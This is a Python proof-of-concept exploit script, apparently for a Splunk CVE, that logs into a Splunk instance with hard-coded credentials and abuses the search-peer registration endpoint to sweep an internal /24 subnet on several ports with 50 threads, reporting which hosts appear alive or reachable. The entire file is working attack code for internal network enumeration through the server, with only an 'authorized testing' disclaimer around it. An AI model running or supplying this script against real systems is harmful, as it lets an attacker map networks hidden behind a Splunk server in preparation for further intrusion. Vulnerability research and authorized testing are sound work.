# CVE-2025-20388 PoC - Splunk Search Peer Enumeration
# Requires a high-privilege user that holds the change_authentication capability.
# Intended only for testing systems you are explicitly authorized to assess.
import requests
import json
from concurrent.futures import ThreadPoolExecutor
# Base URL (scheme and host, without a port) of the Splunk instance under test;
# add_search_peer appends both a path and a ":port" suffix to this value.
SPLUNK_HOST = "https://target-splunk.example.com"
# Hard-coded example credentials posted to the login form by add_search_peer.
USERNAME = "attacker_user"
PASSWORD = "password"
def add_search_peer(target_ip, port=8089):
    """Submit a search-peer registration for ``target_ip`` and classify the reply.

    For authorized security testing only.

    A new ``requests.Session`` is created per call. It first posts the
    module-level ``USERNAME``/``PASSWORD`` to the login form on
    ``SPLUNK_HOST`` (the login response is not inspected), then posts a
    search-peer registration to ``{SPLUNK_HOST}:{port}/services/search/peers``
    with a 5-second timeout. The session is closed before returning.

    Args:
        target_ip: Host placed in the ``name``, ``host`` and ``uri`` fields
            of the peer registration.
        port: Port used both in the request URL on ``SPLUNK_HOST`` and in
            the peer ``uri``. Defaults to 8089.

    Returns:
        A dict with ``"host"``, ``"port"`` and ``"status"`` keys, where
        ``"status"`` is one of:

        * ``"alive"`` - the peer request returned HTTP 200, or it timed out.
        * ``"host_reachable"`` - the response body contains
          ``"connect failed"`` (case-insensitive).
        * ``"unknown"`` - any other response.
        * ``"error"`` - any other exception was raised by the peer request;
          the dict then also carries a ``"detail"`` key with ``str(exc)``.

    Raises:
        Exception: Anything raised by the login request propagates to the
            caller, because that request runs outside the ``try`` block and
            has no timeout.
    """
    login_url = f"{SPLUNK_HOST}/en-US/account/login"
    # The context manager closes the session's pooled connections on exit;
    # the original never closed the session it created on every call.
    with requests.Session() as session:
        # Login to Splunk
        session.post(login_url, data={
            'username': USERNAME,
            'password': PASSWORD,
            'cval': 0
        })
        # Try to add search peer
        peer_url = f"{SPLUNK_HOST}:{port}/services/search/peers"
        try:
            response = session.post(peer_url, data={
                'name': target_ip,
                'host': target_ip,
                'uri': f"https://{target_ip}:{port}"
            }, timeout=5)
            if response.status_code == 200:
                return {"host": target_ip, "port": port, "status": "alive"}
            elif "connect failed" in response.text.lower():
                return {"host": target_ip, "port": port, "status": "host_reachable"}
            else:
                return {"host": target_ip, "port": port, "status": "unknown"}
        except requests.exceptions.Timeout:
            # A timed-out peer request is reported with the same status as HTTP 200.
            return {"host": target_ip, "port": port, "status": "alive"}
        except Exception as e:
            return {"host": target_ip, "port": port, "status": "error", "detail": str(e)}
def enumerate_internal_network(subnet="192.168.1", ports=(8089, 8088, 8087)):
    """Run ``add_search_peer`` over every host/port pair and collect the hits.

    For authorized security testing only.

    Hosts are ``{subnet}.1`` through ``{subnet}.254``. For each port in turn,
    all hosts are submitted to a 50-worker thread pool and their results are
    gathered in submission order before the next port is started.

    Args:
        subnet: First three dotted octets of the network to sweep.
        ports: Iterable of ports to try for every host. The default is an
            immutable tuple so that no mutable object is shared between calls.

    Returns:
        A list of the result dicts from ``add_search_peer`` whose
        ``"status"`` is ``"alive"`` or ``"host_reachable"``, ordered by port
        and then by host.

    Raises:
        Exception: Anything raised inside ``add_search_peer`` is re-raised
            here by ``future.result()``.
    """
    targets = [f"{subnet}.{i}" for i in range(1, 255)]
    # Statuses worth reporting; built once rather than on every iteration.
    reportable = ('alive', 'host_reachable')
    results = []
    with ThreadPoolExecutor(max_workers=50) as executor:
        for port in ports:
            futures = [executor.submit(add_search_peer, ip, port) for ip in targets]
            for future in futures:
                result = future.result()
                if result['status'] in reportable:
                    results.append(result)
    return results
if __name__ == "__main__":
    # Script entry point: announce the run, sweep with the default subnet and
    # ports, then print the collected results as indented JSON.
    print("Enumerating internal network via Splunk search peer feature...")
    report = json.dumps(enumerate_internal_network(), indent=2)
    print(report)